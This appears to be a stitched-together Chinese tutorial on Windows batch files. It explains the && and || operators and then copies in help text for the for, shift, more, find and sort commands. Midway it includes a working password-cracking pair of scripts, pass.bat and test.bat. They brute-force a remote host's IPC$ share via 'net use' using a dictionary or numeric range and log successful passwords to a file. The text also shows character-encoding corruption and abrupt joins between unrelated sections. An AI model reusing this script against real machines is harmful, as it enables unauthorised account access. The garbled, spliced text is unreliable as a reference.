為這里&&命令和>命令不能同時(shí)出現(xiàn)一個(gè)句子里（批處理把一行看成一個(gè)句子）??！組合命令&&的優(yōu)先級(jí)沒(méi)有管道命令>的
優(yōu)先級(jí)高（自己總結(jié)的，不妥的地方請(qǐng)指正）！所以這句在執(zhí)行時(shí)將本分成這兩部分：dir c:和dir d: > a.txt，而并
不是如你想的這兩部分：dir c: && dir d:和> a.txt。要使用組合命令&&達(dá)到題目的要求，必須得這么寫：

dir c: > a.txt && dir d: >> a.txt

這樣，依據(jù)優(yōu)先級(jí)高低，DOS將把這句話分成以下兩部分：dir c: > a.txt和dir d: >> a.txt。例十八中的幾句的差別
比較特殊，值得好好研究體會(huì)一下。

當(dāng)然這里還可以利用&命令（自己想一下道理哦）：

dir c: > a.txt & dir d: >> a.txt

16、||

這個(gè)命令的用法和&&幾乎一樣，但作用剛好和它相反：利用這種方法在執(zhí)行多條命令時(shí)，當(dāng)遇到一個(gè)執(zhí)行正確的命令就退
出此命令組合，不再繼續(xù)執(zhí)行下面的命令。題目：查看當(dāng)前目錄下是否有以s開頭的exe文件，如果有則退出。例十九：

@echo off
dir s*.exe || exit

其實(shí)這個(gè)例子是有破綻的，你看出來(lái)了嗎？其實(shí)很簡(jiǎn)單，自己試試就知道了嘛：如果存在那個(gè)exe文件，就退出；如果不
存在那個(gè)exe文件，也退出！為什么？因?yàn)槿绻淮嬖谀莻€(gè).exe文件，則前一條命令dir s*.exe執(zhí)行肯定是不成功的，所
以就繼續(xù)執(zhí)行exit，自然就退出了，呵呵。那么如何解決題目給出的問(wèn)題呢？看例二十：

@echo off
dir s*.exe || echo Didn't exist file s*.exe & pause & exit

這樣執(zhí)行的結(jié)果，就能達(dá)到題目的要求，是否存在s*.exe將出現(xiàn)兩種結(jié)果。這里加暫停的意思，當(dāng)然是讓你能看到echo輸
出的內(nèi)容，否則一閃而過(guò)的窗口，echo就白寫了。

給出兩個(gè)更好研究?jī)?yōu)先級(jí)（同時(shí)也是更難理解）的腳本，仔細(xì)研究它們的區(qū)別，以便徹底理解各種命令的優(yōu)先級(jí)順序，對(duì)
以后自己利用這些命令寫腳本有很大的好處----不會(huì)出錯(cuò)！OK，請(qǐng)看例二十一和例二十二：
例二十一：

@echo off
dir a.ttt /a & dir a.txt || exit

例二十二：

@echo off
dir a.ttt /a && dir a.txt || exit

警告：患有心腦血管病的朋友請(qǐng)不要研究以上兩例，否則輕者頭大如斗，重者血管爆裂。任何人由于研究這兩個(gè)腳本的區(qū)
別而造成的任何事故由自己或其合法監(jiān)護(hù)人負(fù)責(zé)，與本人和本論壇無(wú)關(guān)。特此警告！

有關(guān)管道命令和組合命令就大概介紹到這里了，不知道聰明的你是否理解？呵呵，能理解就成天才了，除非你以前就已經(jīng)
掌握！千萬(wàn)別小看了這幾個(gè)鬼命令，大棒槌是我的說(shuō)，簡(jiǎn)直就不是人學(xué)的東西！但我還是靜下心來(lái)研究了一番，最后得出
的結(jié)論如上所述，已經(jīng)一點(diǎn)不剩的交給你了，希望你好好收藏并消化吸收，當(dāng)然有錯(cuò)誤被你發(fā)現(xiàn)了，或者不完整的地方被
你看出來(lái)了，請(qǐng)趕緊告訴我一聲！

這幾個(gè)命令真的把我的頭都搞大了。在網(wǎng)上有一篇流傳很廣的批處理教程：“簡(jiǎn)明批處理教程”，雖然說(shuō)的比較全面，但
看起來(lái)很不過(guò)癮。在對(duì)for等命令介紹時(shí)就一個(gè)for /? > a.txt & start a.txt完事了（當(dāng)然這一點(diǎn)上我不能說(shuō)人家什么
，畢竟我連for /?都沒(méi)給出），而對(duì)上述管道命令和組合命令、以及這篇教程以后將講到的用批處理好啊作注冊(cè)表等方面
根本沒(méi)有介紹。我之所以花整整一章來(lái)講管道命令和組合命令，是因?yàn)樗麄儾攀桥幚淼木A和靈魂，能否正確利用好這
幾個(gè)命令，是能否掌握批處理的前提條件。如for、set等DOS命令的問(wèn)題，可以從DOS的角度出發(fā)專門有針對(duì)性的學(xué)習(xí)，但
有關(guān)這幾個(gè)命令的問(wèn)題，卻是不容易精通掌握的----他們之間的關(guān)系太復(fù)雜了！
將下列代碼存為bat文件
1、如果用字典破解：pass.bat 字典文件路徑及名稱主機(jī) 用戶名
2、如果用數(shù)字破解：pass.bat 起始數(shù) 步長(zhǎng) 結(jié)束數(shù) 主機(jī) 用戶名
密碼破解出來(lái)之后，存放于c:pass.txt文件里面。
將下列代碼存為pass.bat文件
@echo off
echo ------------------------------------------------------------------- >>c:pass.txt
echo ------------------------------------------------------------------- >>c:pass.txt
date /t >>c:pass.txt
time /t >>c:pass.txt
echo 破解結(jié)果： >>c:pass.txt
if "%6"=="1" goto 大棒槌是我的說(shuō)2
:大棒槌是我的說(shuō)1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:大棒槌是我的說(shuō)2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
將下列代碼存為test.bat
net use \%1ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令執(zhí)行返回結(jié)果，net use成功返回0，失敗返回2
:answer0
echo 遠(yuǎn)程主機(jī)："%1" >>c:pass.txt
echo 用戶："%3" >>c:pass.txt
echo 密碼：%2 >>c:pass.txt
net use \%1ipc$ /delet
exit
:answer2
For
對(duì)一組文件中的每個(gè)文件運(yùn)行指定的命令。

可以在批處理程序中或直接從命令提示符使用 for 命令。

要在批處理程序中使用 for 命令，請(qǐng)使用以下語(yǔ)法：

for %%variable in (set) docommand [command-parameters]

要在命令提示符下使用 for，請(qǐng)使用以下語(yǔ)法：

for %variable in (set) do command [command-parameters]

參數(shù)

%%variable 或 %variable

代表可替換的參數(shù)。for 命令使用在 set 中指定的每個(gè)文本字符串替換 %%variable（或 %variable），直到此命令（在
command-parameters 中指定）處理所有的文件為止。使用 %% variable 在批處理程序中執(zhí)行 for 命令。使用 %
variable 通過(guò)命令提示符執(zhí)行 for 命令。變量名區(qū)分大小寫。

(set)

指定要用指定的命令處理的一個(gè)或多個(gè)文件或文本字符串。需要括號(hào)。

command

指定要在指定的 set 所包含的每個(gè)文件上執(zhí)行的命令。

command-parameters

指定要用于指定命令（如果指定的命令要使用任何參數(shù)或開關(guān)）的任何參數(shù)或開關(guān)。

如果啟用了命令擴(kuò)展（Windows 2000 中的默認(rèn)設(shè)置)，將支持 for 命令的其他形式。
For 命令的其他形式
如果啟用了命令擴(kuò)展，將支持如下 for 命令的其他格式：

只限于目錄

for /D [%% | %]variable in (set) docommand [command-parameters]

如果 set 包含通配符（* 和 ?），則指定與目錄名匹配，而不是文件名。

遞歸

for /R [[drive :]path] [%% | %]variable in (set) docommand [command-parameters]

進(jìn)入根目錄樹[drive:]path，在樹的每個(gè)目錄中執(zhí)行 for 語(yǔ)句。如果在 /R 后沒(méi)有指定目錄，則假定為當(dāng)前目錄。如果
set 只是一個(gè)句號(hào) (.) 字符，則只列舉目錄樹。

迭代

for /L [%% | %]variable in (start，step，end) do command [command-parameters]

集合是一系列按步長(zhǎng)量劃分的、從頭到尾的數(shù)字。這樣，(1,1,5) 將生成序列 1 2 3 4 5，而 (5,-1,1) 將生成序列 (5
4 3 2 1)。
文件解析

for /F ["options"] [%% | %]variable in (filenameset) do command [command-parameters]

for /F ["options"] [%% | %]variable in ("literal string") do command[command-parameters]

for /F ["options"] [%% | %]variable in ('command') do command [command-parameters]

或者，如果出現(xiàn) usebackq 選項(xiàng)：

for /F ["options"] [%% | %]variable in (filenameset) do command [command-parameters]

for /F ["options"] [%% | %]variable in ('literal string') do command [command-parameters]

for /F ["options"] [%% | %]variable in (`command`) docommand [command-parameters]

filenameset 參數(shù)指定一個(gè)或多個(gè)文件名稱。在繼續(xù)到 filenameset 中的下一個(gè)文件之前，每個(gè)文件都會(huì)被打開、讀取
和處理。

過(guò)程由讀取文件、分成獨(dú)立的文本行及然后將每行解析成零個(gè)或更多個(gè)令牌組成。然后使用設(shè)置為找到的一個(gè)或多個(gè)令牌
字符串的變量值（或多個(gè)值）集合調(diào)用 for 循環(huán)體。默認(rèn)情況下，/F 傳遞每個(gè)文件每一行的第一個(gè)空白分隔符號(hào)。

跳過(guò)空行。通過(guò)指定可選的“options”參數(shù)可以覆蓋默認(rèn)的解析行為。這是一個(gè)引用字符串，它包含一個(gè)或多個(gè)關(guān)鍵字
以指定不同的解析選項(xiàng)。關(guān)鍵字是：

關(guān)鍵字說(shuō)明
eol=c 指定行尾注釋字符（只一個(gè)字符）
skip=n 指定在文件的開頭跳過(guò)的行數(shù)。
delims=xxx 指定定界符集合。這將替換空格和制表符的默認(rèn)分隔符集。
tokens=x,y,m-n 指定將令牌從每行傳遞到每個(gè)反復(fù)的正文。這將導(dǎo)致分配其他變量名。m-n 格式是一個(gè)范圍，指定從
mth 到 nth 的令牌。如果在令牌 = 字符串中最后一個(gè)字符是星號(hào)，則將分配附加的變量，并在解析最后一個(gè)令牌后在行
上接收剩余的文本。
usebackq 指定將右引號(hào)字符串作為命令執(zhí)行，單引號(hào)字符串是文字字符串命令，您可以使用雙引號(hào)包括 filenameset 中
的文件名。

變量替換
此外，已經(jīng)增強(qiáng)了 for 變量引用的替換修改程序?，F(xiàn)在可以使用下列可選的語(yǔ)法（對(duì)于任何變量 I）：

變量（使用修改程序）說(shuō)明
%~I 展開刪除了周圍的任何引號(hào) (") 的 %I
%~fI 將 %I 展開到完全合格的路徑名
%~dI 只將 %I 展開到驅(qū)動(dòng)器號(hào)
%~pI 只將 %I 展開到路徑
%~nI 只將 %I 展開到文件名
%~xI 只將 %I 展開到文件擴(kuò)展名
%~sI 展開路徑以只包含短名稱
%~aI 將 %I 展開到文件的文件屬性
%~tI 將 %I 展開到文件的日期/時(shí)間
%~zI 將 %I 展開到文件大小
%~$PATH:I 搜索 PATH 環(huán)境變量所列出的目錄,并將 %I 展開開到第一個(gè)找到結(jié)果的全部合格名稱。如果沒(méi)有定義環(huán)境變
量名，或搜索后沒(méi)有找到文件，則此修改程序?qū)U(kuò)展為空字符串。

修改程序可以合并以獲得復(fù)雜的結(jié)果：

變量（使用合并的修改程序）說(shuō)明
%~dpI 只將 %I 展開到驅(qū)動(dòng)器號(hào)和路徑
%~nxI 只將 %I 展開到文件名和擴(kuò)展名
%~fsI 將 %I 展開到只包含短名稱的完整路徑名
%~dp$PATH:I 在 PATH 環(huán)境變量所列出的目錄中搜索 %I，并展開到第一個(gè)找到結(jié)果的驅(qū)動(dòng)器號(hào)和路徑
%~ftzaI 將 %I 擴(kuò)展到與 dir 相似的輸出行

注意

在上述范例中，%I 和 PATH 可被其他有效值替換。通過(guò)有效的 for 變量名終止 %~ 語(yǔ)法。
使用大寫變量名（例如 %I）可以使代碼更具可讀性，并且避免與不區(qū)分大小寫的修改程序混淆。
Shift
更改批處理文件中可替換參數(shù)的位置。

shift

啟用命令擴(kuò)展（Windows 2000 中的默認(rèn)設(shè)置）后，shift 命令支持 /n 開關(guān)，該開關(guān)通知命令在第 n 個(gè)參數(shù)處開始更改
，n 可以是從 0 到 8 的任何一個(gè)值。例如，

SHIFT /2

將 %3 改為 %2，將 %4 改為 %3 等等，而 %0 和 %1 保持不變。

篩選器命令
篩選器命令可以幫助您排序、查看和選擇部分命令輸出結(jié)果。

通過(guò)篩選器命令傳遞信息

篩選器命令可以劃分、重排以及提取通過(guò)的部分信息好啊作。Windows 2000 有三個(gè)篩選器命令：

more 命令每次顯示一屏文件內(nèi)容或命令輸出。
find 命令在文件和命令輸出中搜索指定字符。
sort 命令按字母順序排列文件和命令輸出。

要將輸入從文件發(fā)送到篩選器命令，請(qǐng)使用小于符號(hào) (<)。如果要篩選器命令從其他命令獲得輸入，請(qǐng)使用管道 (|)。

使用 more 命令來(lái)控制屏幕顯示

more 命令每次一屏地顯示文件的內(nèi)容或命令輸出。例如，下面的 more 命令每次顯示一屏 List.txt 文件的內(nèi)容：

more < list.txt

信息顯示一屏后，會(huì)出現(xiàn)字“More”。要繼續(xù)顯示下一屏，請(qǐng)按鍵盤上任意鍵。要停止命令且不查看詳細(xì)信息，請(qǐng)按
CTRL+C 鍵。

如果使用產(chǎn)生多屏輸出的命令，more 將十分有用。例如，假設(shè)定要查看硬盤的目錄樹。如果 Windows 2000 不能將目錄
在一屏內(nèi)全部顯示出來(lái)，請(qǐng)使用帶管道號(hào) (|) 和 more 命令的 tree 命令，如下例所示：

tree c: | more

tree 命令的第一屏輸出被顯示，后跟詞“More”。Windows 2000 暫停，直到用戶按鍵盤上的任意鍵為止（PAUSE 鍵除外
）。

使用 find 命令搜索文本

find 命令在一個(gè)或多個(gè)文件中搜索指定文本。Windows 2000 顯示每個(gè)包含該文本的行。find 命令可以用作篩選器命令
或者標(biāo)準(zhǔn)的 Windows 2000 命令。有關(guān)將 find 用作標(biāo)準(zhǔn)的 Windows 2000 命令的信息，請(qǐng)單擊“相關(guān)主題”列表中的
find。

要將 find 當(dāng)作篩選器命令使用，請(qǐng)包含小于符號(hào) (<) 和搜索的文件名。當(dāng)輸入文件名時(shí)，請(qǐng)記住搜索要區(qū)分大小寫。
例如，下面的命令查找文件 Trade.txt 中所有的“Pacific Rim”字符串：

find "Pacific Rim" < trade.txt

要保存 find 命令的輸出而不是顯示輸出，請(qǐng)使用大于號(hào) (>) 和要存儲(chǔ)輸出的文件名。例如，下面的命令查找文件
Trade.txt 中所有的“Pacific Rim”字符串，并將結(jié)果保存在 Nwtrade.txt 文件中：

find "Pacific Rim" < trade.txt > nwtrade.txt

對(duì)文本文件排序

sort 命令按字母順序排列文本文件或命令的輸出。例如，可以使用以下命令對(duì) List.txt 文件的內(nèi)容進(jìn)行排序，并在屏
幕上顯示結(jié)果：

sort < list.txt

在此范例中，sort 命令對(duì) List.txt 文件的行進(jìn)行排序并顯示結(jié)果，但不更改文件。要保存 sort 命令的輸出而不是顯
示輸出，請(qǐng)?jiān)诿钪邪笥谔?hào) (>) 和文件名。例如，可以使用以下命令對(duì) List.txt 文件的行按字母順序排序，并將
結(jié)果存到 Alphlist.txt 文件中：

sort < list.txt > alphlist.txt

要排序命令的輸出，請(qǐng)鍵入后面帶有管道 (|) 和 sort 命令的命令。例如，下面的命令對(duì) find 命令的輸出結(jié)果進(jìn)行排
序：

find "Jones" maillst.txt | sort

在鍵入該命令時(shí)，Windows 2000 按字母順序列出在其中出現(xiàn)“Jones”的行。

帶重定向符的合并命令

可以將篩選器命令、其他命令和文件名合并以生成自定義命令。例如，可以使用以下命令存儲(chǔ)包含“LOG”字符串的文件
名:

dir /b | find "LOG" > loglist.txt

Windows 2000 通過(guò) find 過(guò)濾器命令發(fā)送 dir 命令的輸出并將包含字符串“Log”的文件名存儲(chǔ)在 Loglist.txt 文件中
。將結(jié)果存儲(chǔ)為文件名列表（如，A.log、Logdat.svd 和 Mylog.bat）。

要在相同命令中使用多個(gè)篩選器，請(qǐng)使用管道 (|) 分隔篩選器。例如，下面的命令搜索 C 盤上的每個(gè)目錄以查找包含“
Log”字符串的文件名，并且每次顯示一屏：

dir c: /s /b | find "LOG" | more

因?yàn)槭褂霉艿?(|)，Windows 2000 通過(guò) find 命令發(fā)送 dir 命令的輸出結(jié)果。find 命令只選擇包含字符串“Log”的文
件名。more 命令每次一屏地顯示 find 命令選擇的文件名。
More
每次顯示一個(gè)輸出屏幕。該命令通常用于查看長(zhǎng)文件?？梢詥为?dú)使用此命令，或者使用它控制其他命令的輸出，例如
type 命令。當(dāng)顯示填充可用的查看區(qū)域時(shí)將出現(xiàn) more 提示，用戶可以輸入許多命令來(lái)控制查看文件其余部分的方式。

command name | more [/c] [/p] [/s] [/tn] [+n]

more [[/c] [/p] [/s] [/tn] [+n]] < [drive:][path] filename

more [/c] [/p] [/s] [/tn] [+n] [files]

參數(shù)

[drive:][path] filename

指定要顯示的文件。

command name

指定將顯示其輸出的命令。

/c

顯示頁(yè)面前清除屏幕。

/p

擴(kuò)展換頁(yè)符。

/s

將多個(gè)空白行更改為一個(gè)空白行。

/tn

將制表位更改為 n 個(gè)空格

+n

顯示由 n 指定的行開始的第一個(gè)文件。

files

指定要顯示的文件列表。用空格分隔文件名。

More 子命令

以下命令在 more 提示 (-- More --) 下接受。

關(guān)鍵字好啊作
space 顯示下一頁(yè)。
ENTER 顯示下一行。
F 顯示下一個(gè)文件。
q 退出。
? 顯示可用命令。
= 顯示行號(hào)。
P n 顯示以下 n 行。
S n 跳過(guò)下面 n 行。
Find
在一個(gè)文件或多個(gè)文件中搜索指定的文本字符串。

當(dāng)搜索到指定的文件后，find 將顯示出包含指定字符串的所有行。

find [/v] [/c] [/n] "string" [[drive:][path]filename[...]]

參數(shù)

/v

顯示未包含指定字符串的所有行。

/c

只顯示包含指定字符串的行數(shù)。

/n

將文件行號(hào)置于每行開頭。

/I

指定搜索不區(qū)分大小寫。

"string"

指定要搜索的字符組。必須將 string 的文本包括在引號(hào)中。

[drive:][path] filename

指定要在其中搜索指定字符串的文件的位置和名稱。
Sort
讀取輸入、排序數(shù)據(jù)并將結(jié)果寫到屏幕、文件和其他設(shè)備上。

sort [/r] [/+n] [/m kilobytes] [/l locale] [/rec characters] [[drive1:][path1]filename1] [/t [drive2:]
[path2]] [/o [drive3:][path3]filename3]

[command |] sort [/r] [/+n] [/m kilobytes] [/l locale] [/rec characters] [[drive1:][path1]filename1] [/t
[drive2:][path2]] [/o [drive3:][path3]filename3]

參數(shù)

/r

顛倒排序順序，即從 Z 到 A 排序，然后從 9 到 0 排序。

/+n

指定字符位置號(hào) n，sort 在此處開始每次比較。例如，/+3 表示每次比較在每行的第三個(gè)字符開始。少于 n 個(gè)字符的行
在其他行之前排序。默認(rèn)情況下，比較在每行的第一個(gè)字符開始。

/m kilobytes

指定用于排序的主內(nèi)存數(shù)量，按千字節(jié) (KB) 計(jì)。使用的內(nèi)存最小值總是 160 KB。如果指定了內(nèi)存大小，則無(wú)論有多少
主內(nèi)存可用，指定的確切數(shù)量（但至少 160 KB）的內(nèi)存將用于排序。

如果輸入輸出均為文件，在沒(méi)有指定大小時(shí)，默認(rèn)最大內(nèi)存大小為可用主內(nèi)存的 90％，否則為主內(nèi)存的 45％。默認(rèn)設(shè)置
通常會(huì)產(chǎn)生最佳的性能。

/l locale

替代由系統(tǒng)默認(rèn)區(qū)域設(shè)置定義的字符排序順序；即在安裝 Windows 2000 時(shí)選擇的語(yǔ)言和“國(guó)家（地區(qū)）”。目前，默認(rèn)
區(qū)域設(shè)置唯一的備用選項(xiàng)就是“C”區(qū)域設(shè)置，該區(qū)域設(shè)置比自然語(yǔ)言排序快，根據(jù)二進(jìn)制編碼對(duì)字符排序。

/rec characters

指定記錄或輸入文件的行中的最多字符數(shù)（默認(rèn)值為 4096，最大值為 65535）。

[drive1:][path1]filename1

指定要排序的文件。如果沒(méi)有指定文件名，則對(duì)標(biāo)準(zhǔn)輸入排序。指定輸入文件比將同一文件作為標(biāo)準(zhǔn)輸入重定向速度快。

/t [drive2:][path2]

指定保留 sort 命令工作存儲(chǔ)的目錄路徑，防止數(shù)據(jù)不能裝入主內(nèi)存。默認(rèn)為使用系統(tǒng)臨時(shí)目錄。

/o [drive3:][path3]filename3

指定要存儲(chǔ)排序后的輸入的文件。如果沒(méi)有指定，數(shù)據(jù)將寫入標(biāo)準(zhǔn)輸出。指定輸出文件比將同一文件作為標(biāo)準(zhǔn)輸出重定向
速度快!